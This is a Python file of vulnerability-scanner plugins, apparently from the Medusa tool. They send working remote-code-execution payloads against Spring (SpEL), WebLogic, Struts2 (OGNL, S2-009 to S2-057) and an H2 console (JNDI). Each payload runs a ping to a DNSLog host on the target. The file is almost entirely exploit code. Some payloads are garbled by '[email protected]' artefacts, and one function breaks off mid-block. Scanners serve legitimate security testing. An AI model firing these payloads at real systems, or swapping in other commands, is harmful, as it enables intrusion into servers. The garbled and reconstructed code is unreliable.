def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
    """Probe for CVE-2018-1260 (Spring Security OAuth2 SpEL injection).

    One GET is sent to ``/oauth/authorize`` with a SpEL expression in the
    ``scope`` parameter that calls ``Runtime.exec("ping <dnslog host>")``.
    The target is reported only when the DNSLog service later records a
    lookup for that name; the HTTP body is attached to the report but is not
    used as evidence, so the check is purely out-of-band.

    Practitioner notes:
      * ``verify=False`` is deliberate for a scanner, but it also means an
        on-path attacker can read or alter the probe.
      * ``ping`` is started without a count; on a Linux target it will not
        exit on its own, so a vulnerable host may be left with a running
        process after the scan.

    Args:
        Url: target base URL; split into scheme/host/port by UrlProcessing.
        Headers: request headers, passed through unmodified.
        proxies: optional proxy spec normalised by ``Proxies().result``.
        **kwargs: forwarded to VulnerabilityDetails for report metadata.

    Returns:
        None. Findings go to VulnerabilityDetails/WriteFile; any exception is
        routed to ErrorHandling/ErrorLog.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme when the URL carried none; any other
    # scheme leaves port as None, exactly like the original fall-through.
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        DL = Dnslog()
        spel_probe = (
            "/oauth/authorize?client_id=client&response_type=code"
            "&redirect_uri=http://www.github.com"
            "&scope=%24%7BT%28java.lang.Runtime%29.getRuntime%28%29"
            ".exec%28%22ping%20{}%22%29%7D"
        ).format(DL.dns_host())
        target = "{}://{}:{}{}".format(scheme, url, port, spel_probe)
        resp = requests.get(target,
                            headers=Headers,
                            proxies=proxies,
                            timeout=6,
                            verify=False)
        # Give the target time to resolve the DNSLog name before polling.
        time.sleep(4)
        if DL.result():
            Medusa = (
                "{}存在SpringSecurityOauth2远程代码执行漏洞(CVE-2018-1260)\r\n"
                "验证数据:\r\n返回内容:{}\r\nDnsLog:{}\r\nDnsLog数据:{}\r\n"
            ).format(url, resp.text, DL.dns_host(), str(DL.dns_text()))
            info = VulnerabilityInfo(Medusa).info
            VulnerabilityDetails(info, url, **kwargs).Write()
            # url doubles as the per-target result file name.
            WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin_name)
        ErrorLog().Write(
            "Plugin Name:" + plugin_name + " || Target Url:" + url, e)
def medusa(**kwargs) -> None:
    """Probe for CVE-2018-2628 (WebLogic WLS core deserialisation).

    Delegates the network part to the module-level ``exploit`` helper, which
    receives host/port, the ysoserial jar, a JRMP listener port and gadget
    name, a scratch path and the DNSLog host used as the out-of-band signal.
    The target is reported only if the DNSLog service records a lookup.

    Practitioner notes:
      * ``Headers`` and ``Proxies`` are read from kwargs but never used: the
        traffic generated inside ``exploit`` goes straight to the target, so
        a configured proxy is bypassed by this plugin.
      * a scratch path under GetTempFilePath() (timestamp + random suffix)
        is handed to ``exploit``; nothing in this block cleans it up.
      * ``port`` is only defaulted for http/https; other schemes keep
        whatever UrlProcessing returned (possibly None).

    Args:
        **kwargs: must contain ``Url``; ``Headers``/``Proxies`` are accepted
            for signature parity; everything is forwarded to
            VulnerabilityDetails.
    """
    Url = kwargs.get("Url")
    Headers = kwargs.get("Headers")
    proxies = kwargs.get("Proxies")
    scheme, url, port = UrlProcessing().result(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        DL = Dnslog()
        jrmp_port = "2000"  # arbitrary; only has to be free on the scanner side
        gadget = "JRMPClient"
        jar = GetToolFilePath().Result() + "ysoserial.jar"
        scratch = (GetTempFilePath().Result() + str(int(time.time())) + "_" +
                   randoms().result(10))
        con, payload = exploit(url, port, jar, DL.dns_host(),
                               jrmp_port, gadget, scratch)
        # Wait for the deserialised ping to reach the DNSLog service.
        time.sleep(5)
        if DL.result():
            Medusa = (
                "{}存在WeblogicWLS核心组件反序列化命令执行漏洞(CVE-2018-2628)\r\n"
                "验证数据:\r\n使用POC:{}\r\n返回数据包:{}\r\nDNSlog内容:{}\r\nDNSlog返回结果:{}\r\n"
            ).format(url, payload, con, DL.dns_host(), DL.dns_text())
            info = VulnerabilityInfo(Medusa).info
            VulnerabilityDetails(info, "", **kwargs).Write()
            WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin_name)
        ErrorLog().Write(
            "Plugin Name:" + plugin_name + " || Target Url:" + url, e)
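def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """log4j deserialisation probe built on ysoserial + DNSLog.

    NOTE(review): this block only *generates* a ysoserial
    ``CommonsCollections5`` payload on the scanner host; nothing here sends
    those bytes to ``url``/``port``.  A DNS callback seen by ``dns.result()``
    therefore cannot be attributed to the target, and a finding from this
    plugin must be treated as unverified until a delivery step (sending the
    payload to the target's log4j socket listener) exists.  The report is
    still written so the observable behaviour is otherwise unchanged.

    Changes relative to the original:
      * ``UrlProcessing(Url)`` is called as ``UrlProcessing().result(Url)``
        like every sibling plugin; a bare class instance cannot be unpacked
        into scheme/host/port.
      * the ysoserial child runs under ``subprocess.run`` with a timeout,
        replacing a ``Popen`` whose stdout pipe was never read or closed
        (leaked pipe and an un-reaped child process).

    Args:
        Url: target URL; split into scheme/host/port by UrlProcessing.
        RandomAgent: unused; kept for the common plugin signature.
        proxies: normalised by ``Proxies().result``; unused because no HTTP
            request is made.
        **kwargs: forwarded to VulnerabilityDetails.
    """
    proxies = Proxies().result(proxies)

    scheme, url, port = UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        dns = Dnslog()
        YsoserialPath = GetToolFilePath().Result() + "ysoserial.jar"
        # argv list (shell=False): the DNSLog host is never shell-interpolated.
        # Output is captured and discarded; the payload is not sent anywhere.
        subprocess.run([
            "java", "-jar", YsoserialPath, "CommonsCollections5",
            "ping " + dns.dns_host()
        ],
                       stdout=subprocess.PIPE,
                       stderr=subprocess.PIPE,
                       timeout=30)
        time.sleep(5)
        if dns.result():
            Medusa = "{}存在log4j远程命令执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\nDNSlog请求值{}\r\nDNSlog数据{}\r\n".format(
                url, scheme + "://" + url + ":" + str(port), dns.dns_host(),
                dns.dns_text())
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, **kwargs).Write()
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  # url doubles as the result file name
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(
            "Plugin Name:" + _ + " || Target Url:" + url, e)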
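def medusa(**kwargs) -> None:
    """log4j CVE-2019-17571 probe built on ysoserial + DNSLog.

    NOTE(review): this block only *generates* a ysoserial
    ``CommonsCollections5`` payload on the scanner host; nothing here sends
    those bytes to ``url``.  A DNS callback seen by ``dns.result()`` cannot
    be attributed to the target, so a finding from this plugin must be
    treated as unverified until a delivery step (sending the payload to the
    target's log4j SocketServer) exists.  The report is still written so the
    observable behaviour is otherwise unchanged.

    Changes relative to the original:
      * the ysoserial child runs under ``subprocess.run`` with a timeout,
        replacing a ``Popen`` whose stdout pipe was never read or closed
        (leaked pipe and an un-reaped child process).
      * the error-log line uses ``str(url)`` so a missing ``Url`` kwarg does
        not raise a second exception inside the handler.

    Args:
        **kwargs: ``Url`` (target), ``Headers`` and ``Proxies`` (both unused
            here because no HTTP request is made); forwarded to
            VulnerabilityDetails.
    """
    url = kwargs.get("Url")
    Headers = kwargs.get("Headers")
    proxies = kwargs.get("Proxies")
    try:
        dns = Dnslog()
        YsoserialPath = GetToolFilePath().Result() + "ysoserial.jar"
        # argv list (shell=False): the DNSLog host is never shell-interpolated.
        # Output is captured and discarded; the payload is not sent anywhere.
        subprocess.run([
            "java", "-jar", YsoserialPath, "CommonsCollections5",
            "ping " + dns.dns_host()
        ],
                       stdout=subprocess.PIPE,
                       stderr=subprocess.PIPE,
                       timeout=30)
        time.sleep(5)
        if dns.result():
            Medusa = "{}存在log4j远程命令执行漏洞(CVE-2019-17571)\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\nDNSlog请求值{}\r\nDNSlog数据{}\r\n".format(
                url, url, dns.dns_host(), dns.dns_text())
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, "", **kwargs).Write()
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  # url doubles as the result file name
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(
            "Plugin Name:" + _ + " || Target Url:" + str(url), e)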
def medusa(**kwargs) -> None:
    """Probe for Struts2 S2-009 (OGNL smuggled through a parameter name).

    The DNSLog host is embedded in an OGNL expression carried in the query
    string (``?age=medusa&name=...``); the expression calls
    ``Runtime.exec("ping <dnslog>")``, so the target is reported only when
    the DNSLog service records a lookup.  The query is appended to ``Url``
    exactly as given: no port normalisation, and a URL that already has a
    query string would end up with two ``?``.

    NOTE(review): the ``%[email protected]@getRuntime`` fragment in the payload looks
    like an e-mail-obfuscation artefact of the scraped copy of this file; it
    is reproduced verbatim here and should be restored from upstream before
    relying on this plugin.  ``Dnslog()`` and the payload are built before
    the ``try`` as in the original, so a DNSLog registration failure is not
    routed to ErrorLog.

    Args:
        **kwargs: ``Url``, ``Headers`` (passed unmodified) and ``Proxies``;
            the whole mapping is forwarded to VulnerabilityDetails.
    """
    url = kwargs.get("Url")
    Headers = kwargs.get("Headers")
    proxies = kwargs.get("Proxies")
    DL = Dnslog()
    ognl_query = """?age=medusa&name=%28%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D+new+java.lang.Boolean%28false%29,%20%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3D+new+java.lang.Boolean%28true%29,%[email protected]@getRuntime%28%29.exec%28%27ping%20{}%27%29%29%28meh%29&z%5B%28name%29%28%27meh%27%29%5D=true""".format(
        DL.dns_host())
    try:
        payload_url = url + ognl_query
        resp = requests.get(payload_url,
                            headers=Headers,
                            timeout=6,
                            proxies=proxies,
                            verify=False)
        con = resp.text
        # Allow the target's DNS lookup to reach the DNSLog service.
        time.sleep(3)
        if not DL.result():
            return
        Medusa = "{} 存在Struts2远程代码执行漏洞(S2-009)\r\n漏洞详情:\r\n版本号:S2-009\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(
            url, payload_url, con, DL.dns_text(), DL.dns_host())
        info = VulnerabilityInfo(Medusa).info
        # This plugin hands the Response object (not url) to the writer.
        VulnerabilityDetails(info, resp, **kwargs).Write()
        WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin_name)
        ErrorLog().Write(
            "Plugin Name:" + plugin_name + " || Target Url:" + url, e)
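def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
    """Probe the Spring Boot H2 console for JNDI injection via its login form.

    Flow:
      1. GET ``/h2-console/login.do?jsessionid=<dummy>`` and scrape the real
         ``jsessionid`` the console echoes back (``login.jsp`` or ``admin.do``
         link).
      2. POST a "Generic JNDI Data Source" whose driver is
         ``javax.naming.InitialContext`` and whose URL is
         ``ldap://<dnslog>/Exploit``.  A vulnerable console performs the JNDI
         lookup, which resolves the DNSLog host.  Only that DNS hit is used as
         evidence; nothing here serves an LDAP response.

    NOTE(review): in the copy of this file under review the line building
    ``data`` was truncated (``password="******"`` was spliced straight into
    the report string).  The end of ``data``, the POST, the wait and the
    ``DL.result()`` gate below are reconstructed from the first request in
    this block and the sibling plugins; re-check them against upstream.

    Fixes relative to the original:
      * no ``global pgroups``; the scraped session id is a local.
      * when no session id can be scraped the plugin returns instead of
        raising IndexError into the error log.
      * ``Headers`` is copied before Content-Type/Referer are added, so the
        caller's dict (shared with other plugins) is not mutated.

    Args:
        Url: target base URL; split into scheme/host/port by UrlProcessing.
        Headers: request headers; not mutated.
        proxies: optional proxy spec normalised by ``Proxies().result``.
        **kwargs: forwarded to VulnerabilityDetails.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        base = scheme + "://" + url + ":" + str(port) + "/h2-console/login.do?jsessionid="
        # Any value works here; the console answers with its own session id.
        jsession = requests.get(
            base + "ad3ae393781ccf8d7abf0345aa88e398",
            timeout=5,
            proxies=proxies,
            verify=False,
            headers=Headers,
        )
        session_ids = re.findall(r"login\.jsp\?jsessionid=(.*?)'", jsession.text, re.S)
        if not session_ids:
            session_ids = re.findall(r"admin\.do\?jsessionid=(.*?)\"", jsession.text, re.S)
        if not session_ids:
            # Not an H2 console (or an unfamiliar page layout): nothing to test.
            return

        payload_url2 = base + session_ids[0]

        # Copy first: the original wrote straight into the caller's dict.
        post_headers = dict(Headers or {})
        post_headers['Content-Type'] = 'application/x-www-form-urlencoded'
        post_headers['Referer'] = payload_url2

        DL = Dnslog()
        data = (
            "language=en&setting=Generic+JNDI+Data+Source&name=Generic+JNDI+Data+Source"
            "&driver=javax.naming.InitialContext&url=ldap%3A%2F%2F{}%2FExploit"
            "&user=&password="
        ).format(DL.dns_host())
        resp = requests.post(payload_url2,
                             data=data,
                             headers=post_headers,
                             timeout=5,
                             proxies=proxies,
                             verify=False)
        # Let the JNDI lookup reach the DNSLog service before polling.
        time.sleep(4)
        if DL.result():
            Medusa = "{}存在SpringBootH2数据库JNDI注入漏洞\r\n验证数据:\r\n返回内容:{}\r\nDnsLog:{}\r\nDnsLog数据:{}\r\n".format(
                url, resp.text, DL.dns_host(), str(DL.dns_text()))
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url, **kwargs).Write()
            WriteFile().result(str(url), str(Medusa))  # url doubles as the result file name
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e)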
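def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
    """Probe for Struts2 S2-046 (OGNL in the multipart part ``filename``).

    A multipart body is POSTed whose part filename is an OGNL expression
    terminated by a NUL byte, with a Content-Length far larger than the
    body.  The expression runs ``ping <dnslog>`` through ProcessBuilder, so
    the target is reported only if the DNSLog service records a lookup; the
    HTTP response body is attached to the report but is not used as
    evidence.

    Changes relative to the original:
      * the shipped payload ran ``whoami`` and never mentioned the DNSLog
        host, so ``DL.result()`` could never fire for this probe; the command
        is now ``ping <dnslog>``, the same as the sibling S2-045 plugin uses
        with this very OGNL template.
      * ``Headers`` is copied before Content-Length/Content-Type are set, so
        the caller's dict is not polluted for the plugins that run next.
      * only ``requests.RequestException`` is swallowed around the POST (the
        target may block on ``ping`` until our timeout); anything else goes
        to the error log instead of being hidden.

    NOTE(review): the ``[email protected]`` fragment inside the OGNL is an
    e-mail-obfuscation artefact of the scraped copy of this file and is
    reproduced verbatim; restore the expression from upstream before use.

    Args:
        Url: target URL including the action path.
        Headers: request headers; not mutated.
        proxies: optional proxy spec normalised by ``Proxies().result``.
        **kwargs: forwarded to VulnerabilityDetails.
    """
    proxies = Proxies().result(proxies)

    scheme, url, port, path = UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    DL = Dnslog()
    con = ""
    template = b"""-----------------------------735323031399963166993862150
Content-Disposition: form-data; name="foo"; filename="%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\x00"
Content-Type: text/plain

x
-----------------------------735323031399963166993862150--
"""
    # Swap the in-band 'whoami' for the out-of-band ping the detector relies on.
    data = template.replace(b"#cmd='whoami'",
                            ("#cmd='ping " + DL.dns_host() + "'").encode())
    try:
        payload_url = scheme + "://" + url + ":" + str(port) + path

        req_headers = dict(Headers or {})
        # Oversized Content-Length is part of the published S2-046 trigger.
        req_headers["Content-Length"] = "10000000"
        req_headers[
            "Content-Type"] = "multipart/form-data; boundary=---------------------------735323031399963166993862150"

        try:
            resp = requests.post(payload_url,
                                 headers=req_headers,
                                 data=data,
                                 timeout=6,
                                 proxies=proxies,
                                 verify=False)
            con = resp.text
        except requests.RequestException:
            # Expected when the target's ping holds the response open past
            # our timeout; the DNS callback is the real signal, keep going.
            pass

        time.sleep(2)
        if DL.result():
            Medusa = "{} 存在Struts2远程代码执行漏洞(S2-046)\r\n漏洞详情:\r\n版本号:S2-046\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(
                url, data, con, DL.dns_text(), DL.dns_host())
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url, **kwargs).Write()
            WriteFile().result(str(url), str(Medusa))  # url doubles as the result file name
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e)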
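def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Probe for Struts2 S2-057 (OGNL evaluated from the request namespace).

    Two URL-encoded OGNL payloads are tried in turn; each is inserted as an
    extra path segment between the directory part of ``path`` and the action
    name.  Both run ``ping <dnslog>`` and try to write the output into the
    response, but only the DNSLog callback is used as evidence.

    Changes relative to the original:
      * the bare ``except:`` around the GET (which also swallowed
        KeyboardInterrupt) now catches ``requests.RequestException`` only.
      * a 2 s wait precedes the DNSLog poll, like the sibling S2 plugins;
        the original polled immediately after the request.
      * the loop stops after the first positive result, so one vulnerable
        target is not reported twice; ``con`` is reset per payload so a
        report never carries the previous payload's response body.

    NOTE(review): the ``[email protected]`` fragments inside both payloads are
    e-mail-obfuscation artefacts of the scraped copy of this file and are
    reproduced verbatim; restore the expressions from upstream before use.

    Args:
        Url: target URL including the action path.
        RandomAgent: User-Agent string for the probe request.
        proxies: optional proxy spec normalised by ``Proxies().result``.
        **kwargs: forwarded to VulnerabilityDetails.
    """
    proxies = Proxies().result(proxies)

    scheme, url, port, path = UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    DL = Dnslog()
    payload1 = '%24%7B%28%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27' + "ping%20" + DL.dns_host(
    ) + '%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/'
    payload2 = "%24%7B%28%23dm%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%[email protected]@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27" + "ping%20" + DL.dns_host(
    ) + "%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/"
    for payload in (payload1, payload2):
        con = ""
        try:
            # os.path.split works on the URL path because it is '/'-separated.
            directory, action = os.path.split(path)
            payload_url = scheme + "://" + url + ":" + str(
                port) + directory + "/" + payload + action
            headers = {
                'User-Agent': RandomAgent,
                "Accept-Language":
                "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
                "Accept-Encoding": "gzip, deflate",
            }
            try:
                resp = requests.get(payload_url,
                                    headers=headers,
                                    timeout=6,
                                    proxies=proxies,
                                    verify=False,
                                    allow_redirects=False)
                con = resp.text
            except requests.RequestException:
                # Expected when the target's ping holds the response open
                # past our timeout; the DNS callback is the real signal.
                pass
            time.sleep(2)
            if DL.result():
                Medusa = "{} 存在Struts2远程代码执行漏洞(S2-057)\r\n漏洞详情:\r\n版本号:S2-057\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(
                    url, payload_url, con, DL.dns_text(), DL.dns_host())
                _t = VulnerabilityInfo(Medusa)
                VulnerabilityDetails(_t.info, url, **kwargs).Write()
                WriteFile().result(str(url), str(Medusa))  # url doubles as the result file name
                break
        except Exception as e:
            _ = VulnerabilityInfo('').info.get('algroup')
            ErrorHandling().Outlier(e, _)
            _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
                                  e)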
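def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Probe for Struts2 S2-015 (OGNL in a wildcard-matched action name).

    The URL-encoded OGNL expression is appended to ``path`` as
    ``${...}.action``; it flips ``allowStaticMethodAccess`` via reflection and
    runs ``ping <dnslog>``.  Only the DNSLog callback is used as evidence;
    the response body is attached to the report.

    Change relative to the original: the bare ``except:`` around the GET
    (which also swallowed KeyboardInterrupt) now catches
    ``requests.RequestException`` only; anything else reaches the error log.

    NOTE(review): the ``[email protected]`` fragments inside the payload are
    e-mail-obfuscation artefacts of the scraped copy of this file and are
    reproduced verbatim; restore the expression from upstream before use.

    Args:
        Url: target URL including the action path.
        RandomAgent: User-Agent string for the probe request.
        proxies: optional proxy spec normalised by ``Proxies().result``.
        **kwargs: forwarded to VulnerabilityDetails.
    """
    proxies = Proxies().result(proxies)

    scheme, url, port, path = UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    DL = Dnslog()
    con = ""
    payload = """%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27ping%20{}%27%29.getInputStream%28%29%29%2C%23q%7D.action""".format(
        DL.dns_host())
    try:
        payload_url = scheme + "://" + url + ":" + str(port) + path + payload
        headers = {
            'User-Agent': RandomAgent,
            "Accept-Language":
            "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
        }

        try:
            resp = requests.get(payload_url,
                                headers=headers,
                                timeout=6,
                                proxies=proxies,
                                verify=False)
            con = resp.text
        except requests.RequestException:
            # Expected when the target's ping holds the response open past
            # our timeout; the DNS callback is the real signal, keep going.
            pass

        time.sleep(2)
        if DL.result():
            Medusa = "{} 存在Struts2远程代码执行漏洞(S2-015)\r\n漏洞详情:\r\n版本号:S2-015\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(
                url, payload_url, con, DL.dns_text(), DL.dns_host())
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url, **kwargs).Write()
            WriteFile().result(str(url), str(Medusa))  # url doubles as the result file name
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e)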
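def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Probe for Struts2 S2-016 (OGNL through the ``redirect:`` prefix).

    The ``?redirect:${...}`` query runs ``ping <dnslog>`` via ProcessBuilder
    and tries to stream its output into the response.  Only the DNSLog
    callback is used as evidence; the response body is attached to the
    report.

    Change relative to the original: the bare ``except:`` around the GET
    (which also swallowed KeyboardInterrupt) now catches
    ``requests.RequestException`` only; anything else reaches the error log.

    Args:
        Url: target URL including the action path.
        RandomAgent: User-Agent string for the probe request.
        proxies: optional proxy spec normalised by ``Proxies().result``.
        **kwargs: forwarded to VulnerabilityDetails.
    """
    proxies = Proxies().result(proxies)

    scheme, url, port, path = UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    DL = Dnslog()
    con = ""
    payload = """?redirect:%24%7B%23a%3D%28new%20java.lang.ProcessBuilder%28new%20java.lang.String%5B%5D%7B%27ping%27%2c%27{}%27%7D%29%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew%20java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew%20java.io.BufferedReader%28%23c%29%2C%23e%3Dnew%20char%5B500%5D%2C%23d.read%28%23e%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23d.read%28%23e%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23d.read%28%23e%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23d.read%28%23e%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23d.read%28%23e%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D""".format(
        DL.dns_host())
    try:
        payload_url = scheme + "://" + url + ":" + str(port) + path + payload
        headers = {
            'User-Agent': RandomAgent,
            "Accept-Language":
            "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
        }

        try:
            resp = requests.get(payload_url,
                                headers=headers,
                                timeout=6,
                                proxies=proxies,
                                verify=False)
            con = resp.text
        except requests.RequestException:
            # Expected when the target's ping holds the response open past
            # our timeout; the DNS callback is the real signal, keep going.
            pass

        time.sleep(2)
        if DL.result():
            Medusa = "{} 存在Struts2远程代码执行漏洞(S2-016)\r\n漏洞详情:\r\n版本号:S2-016\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(
                url, payload_url, con, DL.dns_text(), DL.dns_host())
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url, **kwargs).Write()
            WriteFile().result(str(url), str(Medusa))  # url doubles as the result file name
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e)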
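def medusa(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
    """Probe for the Spring Data Commons SpEL injection (CVE-2018-1273 family).

    POSTs a form to ``/users?page=&size=5`` whose field name is a SpEL
    expression, ``username[#this.getClass().forName("java.lang.Runtime")
    .getRuntime().exec("ping+<dnslog>")]``.  The target is reported only if
    the DNSLog service records a lookup; the response body is attached to
    the report but not used as evidence.

    Change relative to the original: the stray ``print(Medusa)`` is gone. It
    dumped the full report (including the response body) to stdout, which no
    sibling plugin does and which WriteFile already persists.

    Args:
        Url: target base URL; split into scheme/host/port by UrlProcessing.
        RandomAgent: User-Agent string for the probe request.
        proxies: optional proxy spec normalised by ``Proxies().result``.
        **kwargs: forwarded to VulnerabilityDetails.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:

        DL = Dnslog()
        # Sent as a raw body string; '+' is the form-encoded space in the
        # ping command line.
        data = """username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("ping+%s")]=xxx""" % DL.dns_host(
        )
        payload = "/users?page=&size=5"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            "Accept-Language":
            "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
            "Content-Type": "application/x-www-form-urlencoded",
            "Referer": payload_url
        }
        resp = requests.post(payload_url,
                             data=data,
                             headers=headers,
                             proxies=proxies,
                             timeout=6,
                             verify=False)
        # Allow the target's DNS lookup to reach the DNSLog service.
        time.sleep(4)
        if DL.result():
            Medusa = "{}存在SpringDataCommons远程命令执行漏洞\r\n验证数据:\r\n返回内容:{}\r\nDnsLog:{}\r\nDnsLog数据:{}\r\n".format(
                url, resp.text, DL.dns_host(), str(DL.dns_text()))
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url, **kwargs).Write()
            WriteFile().result(str(url), str(Medusa))  # url doubles as the result file name
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
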